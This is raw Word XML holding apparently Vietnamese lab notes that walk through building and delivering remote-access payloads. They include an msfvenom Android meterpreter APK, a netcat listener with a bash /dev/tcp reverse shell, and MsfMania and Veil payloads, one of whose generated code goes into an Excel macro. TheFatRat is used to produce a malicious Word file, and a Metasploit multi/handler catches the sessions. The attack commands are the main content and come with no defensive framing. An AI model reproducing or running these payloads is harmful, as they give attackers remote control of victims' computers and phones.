          </w:p>
          <w:p w14:paraId="4090091E" w14:textId="77777777" w:rsidR="00483729" w:rsidRDefault="00483729" w:rsidP="00396A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660033"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70BA8861" w14:textId="77777777" w:rsidR="00483729" w:rsidRDefault="00483729" w:rsidP="00396A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3F0EF231" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00036807" w:rsidRDefault="00483729" w:rsidP="00396A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b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00036807">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>android</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6E0C81" w14:textId="77777777" w:rsidR="00483729" w:rsidRPr="00C53D9B" w:rsidRDefault="00483729" w:rsidP="00396A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A47AD">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R&gt;android.apk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="197CC6BA" w14:textId="41F576BB" w:rsidR="00483729" w:rsidRDefault="002A7F78">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C659C8" w14:textId="4565F332" w:rsidR="002A7F78" w:rsidRDefault="002A7F78">
      <w:r>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC2A9D" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573"/>
    <w:p w14:paraId="7DD968ED" w14:textId="3708FC19" w:rsidR="00932573" w:rsidRPr="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932573">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NETCAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463B426" w14:textId="56A472EA" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r>
        <w:t>2 máy: Kali, LPI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003078D" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r>
        <w:t>Bên Kali mở port hứng sẵn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8798D" w14:textId="43BBB994" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r w:rsidRPr="00262944">
        <w:t>nc -l -p 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8BC281" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r>
        <w:t>bên LPI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1B61D" w14:textId="13CB3604" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r w:rsidRPr="00262944">
        <w:t>bash -c 'exec bash -i &amp;&gt;/dev/tcp/192.168.74.162/12345 &lt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E3E35C" w14:textId="42962B32" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573"/>
    <w:p w14:paraId="52D5A8D5" w14:textId="77777777" w:rsidR="00932573" w:rsidRPr="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932573">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Msfmania</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAE0B2" w14:textId="3D4FE77C" w:rsidR="00932573" w:rsidRDefault="00FA3982" w:rsidP="00932573">
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00932573">
        <w:t xml:space="preserve">it clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00932573" w:rsidRPr="00E81B39">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/G1ft3dC0d3/MsfMania.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="414B0D64" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r>
        <w:t xml:space="preserve">Python3 MsfMania  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D9169" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r>
        <w:t>Tự cài các thành phần, đợi 1 chút là xong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D07269" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r w:rsidRPr="00ED6DD7">
        <w:t>python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.74.162 -lp 4444 -o hungtn -it local --hash md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C21D5B" w14:textId="77777777" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r>
        <w:t>hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED0599" w14:textId="77777777" w:rsidR="00932573" w:rsidRPr="00ED6DD7" w:rsidRDefault="00932573" w:rsidP="00932573">
      <w:r w:rsidRPr="00ED6DD7">
        <w:t xml:space="preserve">python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.74.162 -lp 4444 -o hungtn -it </w:t>
      </w:r>
      <w:r>
        <w:t>remote -pn abc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603F0DD" w14:textId="15E4E3A6" w:rsidR="00932573" w:rsidRDefault="00932573" w:rsidP="00932573"/>
    <w:p w14:paraId="08FE1593" w14:textId="1E1C5346" w:rsidR="00932573" w:rsidRDefault="00EB1AB1" w:rsidP="00932573">
      <w:r>
        <w:t>Veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB36A7D" w14:textId="57EC06F3" w:rsidR="00EB1AB1" w:rsidRDefault="00EB1AB1" w:rsidP="00932573">
      <w:r w:rsidRPr="00EB1AB1">
        <w:t>apt-get install veil-evasion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3890C" w14:textId="55A5DEF8" w:rsidR="00EB1AB1" w:rsidRDefault="00EB1AB1" w:rsidP="00932573">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5767C43B" wp14:editId="51953C70">
            <wp:extent cx="5364945" cy="1318374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0E9D" w14:textId="75FFAFA1" w:rsidR="00EB1AB1" w:rsidRDefault="00EB1AB1" w:rsidP="00932573">
      <w:r>
        <w:t>veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC7876D" w14:textId="2BDFF706" w:rsidR="00EB1AB1" w:rsidRDefault="00EB1AB1" w:rsidP="00932573">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A145ED8" wp14:editId="11B8BE76">
            <wp:extent cx="4938188" cy="283488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B436" w14:textId="653C7E56" w:rsidR="00EB1AB1" w:rsidRDefault="00EB1AB1" w:rsidP="00932573">
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620EB35" w14:textId="6323AE4C" w:rsidR="00EB1AB1" w:rsidRDefault="00DC6C90" w:rsidP="00932573">
      <w:r>
        <w:t>Sau khi cài xong chạy : veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51722047" w14:textId="6AE2758B" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00932573">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A01F0D8" wp14:editId="27B15139">
            <wp:extent cx="4801016" cy="37417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50D5" w14:textId="54093546" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00932573">
      <w:r w:rsidRPr="00DC6C90">
        <w:t>Veil&gt;: use 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DADDA" w14:textId="6C0F06C4" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00932573">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="696065BB" wp14:editId="478C4A66">
            <wp:extent cx="5082980" cy="259102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73A2" w14:textId="362FA08D" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00932573">
      <w:r>
        <w:t>list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF5B75" w14:textId="14791A25" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00932573">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04ECBD0F" wp14:editId="4500090A">
            <wp:extent cx="4930567" cy="370364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6E56" w14:textId="5FC49EB6" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t xml:space="preserve">Chọn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15098A3B" w14:textId="0509625B" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t>use 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E6B01" w14:textId="4A1C8C83" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="162125E5" wp14:editId="3E61D45B">
            <wp:extent cx="4915326" cy="34597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552E" w14:textId="3B4A5233" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t>Tên file bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D404632" w14:textId="22C48859" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECCFF8F" wp14:editId="6162B4F2">
            <wp:extent cx="4869602" cy="3726503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8F67" w14:textId="191A5212" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FBFBA3" wp14:editId="4BA87842">
            <wp:extent cx="5288738" cy="1684166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4B11" w14:textId="0117A952" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t>Copy đường dẫn file bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C75AC7" w14:textId="3AA508E8" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r w:rsidRPr="00DC6C90">
        <w:t>/var/lib/veil/output/source/hung.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6853740B" w14:textId="51343037" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t>B2: convert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A9D19" w14:textId="536D25E5" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t>use 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AE4ED" w14:textId="2EE693A1" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="381951E1" wp14:editId="11A2D589">
            <wp:extent cx="5014395" cy="195088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5D6E" w14:textId="7AD54542" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1745F8AF" wp14:editId="278029EE">
            <wp:extent cx="5212532" cy="3010161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DED9" w14:textId="4DA6B56C" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0462EE9F" wp14:editId="52BA3C43">
            <wp:extent cx="5403048" cy="1889924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DD55" w14:textId="22FD4244" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:t>Copy ra Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E3F840" w14:textId="4480AA7F" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BDB8910" wp14:editId="74B4507C">
            <wp:extent cx="4679085" cy="1364098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90F2" w14:textId="36902435" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90">
      <w:r w:rsidRPr="00DC6C90">
        <w:t>cp  /var/lib/veil/output/source/hung1.txt /root/Desktop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9CC5C" w14:textId="50051755" w:rsidR="00DC6C90" w:rsidRDefault="00BA2A36">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5970DCAC" wp14:editId="62C58ED3">
            <wp:extent cx="5943600" cy="42176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FA2F" w14:textId="31157660" w:rsidR="00BA2A36" w:rsidRDefault="00BA2A36">
      <w:r>
        <w:t>Copy toàn bộ code vào macro của excell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B32E7" w14:textId="77777777" w:rsidR="00BA2A36" w:rsidRDefault="00BA2A36"/>
    <w:p w14:paraId="2A67D44B" w14:textId="1D4B09EC" w:rsidR="00DC6C90" w:rsidRDefault="00BA2A36">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23398CA6" wp14:editId="1EE39EAD">
            <wp:extent cx="5943600" cy="45053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699D" w14:textId="4E5DCC18" w:rsidR="00BA2A36" w:rsidRDefault="00BA2A36">
      <w:r>
        <w:t>Sau đó save lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D163FA" w14:textId="77777777" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90"/>
    <w:p w14:paraId="732F9423" w14:textId="4876D4E0" w:rsidR="002A7F78" w:rsidRDefault="00E55013">
      <w:r>
        <w:t>TheFATRat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A832D" w14:textId="0722BF6C" w:rsidR="00B57A60" w:rsidRDefault="00B57A60">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00B328CB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Screetsec/TheFatRat.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0081555B" w14:textId="43438B06" w:rsidR="00B57A60" w:rsidRDefault="00B57A60">
      <w:r>
        <w:t>chạy ./setup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113945D7" w14:textId="5D3908B8" w:rsidR="00462360" w:rsidRDefault="00462360"/>
    <w:p w14:paraId="70105CD9" w14:textId="2FAC8BBF" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:t>tạo file Word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979DD7B" w14:textId="70C9F48A" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:t>chạy lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB73CAF" w14:textId="7BAD8BE4" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:t>fatrat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969A607" w14:textId="78AA7058" w:rsidR="00B57A60" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FA09ED0" wp14:editId="1101446B">
            <wp:extent cx="4877223" cy="37188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D801" w14:textId="1630E8FA" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:t>Chọn 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D668CAB" w14:textId="52F7D6C6" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5010DE33" wp14:editId="700034D6">
            <wp:extent cx="4724809" cy="2248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4C77" w14:textId="6BFB097E" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:t>Chọn 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A81525" w14:textId="71C8B09E" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="654B281E" wp14:editId="4558913D">
            <wp:extent cx="5022015" cy="2354784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86F9" w14:textId="5C50D85D" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62292C0A" wp14:editId="132DBA4D">
            <wp:extent cx="5029636" cy="28882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5110" w14:textId="07D804F0" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655F10B0" wp14:editId="771F539F">
            <wp:extent cx="4968671" cy="281964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0D49" w14:textId="2D38EF64" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B60303" wp14:editId="31693C3E">
            <wp:extent cx="4877223" cy="160033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9323" w14:textId="17E93430" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:t>Chọn 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883C0D2" w14:textId="5F956334" w:rsidR="00462360" w:rsidRDefault="00462360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02632247" wp14:editId="60C0CD6B">
            <wp:extent cx="4983912" cy="328450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99DC" w14:textId="137A9084" w:rsidR="00462360" w:rsidRDefault="00462360" w:rsidP="00462360">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Tạo ra file word trong : </w:t>
      </w:r>
      <w:r w:rsidRPr="00462360">
        <w:t>/root/Fatrat_Generated/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006E427" w14:textId="6A7AB80D" w:rsidR="00462360" w:rsidRDefault="00462360" w:rsidP="00462360">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194687AA" wp14:editId="12ABF8F6">
            <wp:extent cx="4961050" cy="195851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BDE4" w14:textId="166697DD" w:rsidR="00462360" w:rsidRDefault="00462360" w:rsidP="00462360">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DCC230" w14:textId="2AF8974D" w:rsidR="00462360" w:rsidRDefault="00462360" w:rsidP="00462360">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Mở Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFEC208" w14:textId="12940263" w:rsidR="00462360" w:rsidRDefault="00DC6C90" w:rsidP="00462360">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00462360">
        <w:t>sfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ADF5F0" w14:textId="77777777" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00DC6C90">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf6 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA7F1F" w14:textId="77777777" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00DC6C90">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979457B" w14:textId="77777777" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00DC6C90">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; set lhost 192.168.74.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DE85C" w14:textId="77777777" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00DC6C90">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; set lport 1111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D317029" w14:textId="16188AB0" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00DC6C90">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D4A9E" w14:textId="4F0FCE28" w:rsidR="00DC6C90" w:rsidRDefault="00DC6C90" w:rsidP="00DC6C90">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1107"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C64C00E" wp14:editId="226836AA">
            <wp:extent cx="4877223" cy="33988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C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1183"/>
    <w:rsid w:val="002A7F78"/>
    <w:rsid w:val="00462360"/>
    <w:rsid w:val="00483729"/>
    <w:rsid w:val="008C1183"/>
    <w:rsid w:val="00932573"/>
    <w:rsid w:val="00B57A60"/>
    <w:rsid w:val="00BA2A36"/>
    <w:rsid w:val="00DC6C90"/>
    <w:rsid w:val="00E55013"/>
    <w:rsid w:val="00EB1AB1"/>
    <w:rsid w:val="00F078FA"/>
    <w:rsid w:val="00F112EB"/>
    <w:rsid w:val="00FA3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DEB0D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{89087C09-A849-4C45-9B8B-72C549650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25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7A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1.tmp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png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.tmp"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.tmp"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.tmp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19.tmp"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Screetsec/TheFatRat.git" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/G1ft3dC0d3/MsfMania.git" TargetMode="Externa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theme" Target="theme/theme1.xml"/><Relationship Id="rId8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F4C83FA6F25849880AD97F4E5A739A" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="9032f66add844fa627d5b3eabcc408c9">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="c99cda38-a936-4fbc-b6ff-8b0a040b3a40" xmlns:ns3="4931bcf3-93b8-4508-ae32-3faeadbf19e5" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f67e14b78e932611706ffaff02345ab3" ns2:_="" ns3:_="">
    <xsd:import namespace="c99cda38-a936-4fbc-b6ff-8b0a040b3a40"/>
    <xsd:import namespace="4931bcf3-93b8-4508-ae32-3faeadbf19e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9cda38-a936-4fbc-b6ff-8b0a040b3a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31bcf3-93b8-4508-ae32-3faeadbf19e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183D7CF-9804-4CCC-9E9E-2EDB3450B456}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3DE2BE2B-BE1D-43DF-9ECF-EFAC107F2404}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{85EC260C-87D5-4E02-B93C-8A1A703484C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14</Pages>
  <Words>629</Words>
  <Characters>3227</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>54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 hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ngoc hung</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-08-04T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-29T16:27:00Z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0x01010055F4C83FA6F25849880AD97F4E5A739A</vt:lpwstr>
  </property>
</Properties>
</file>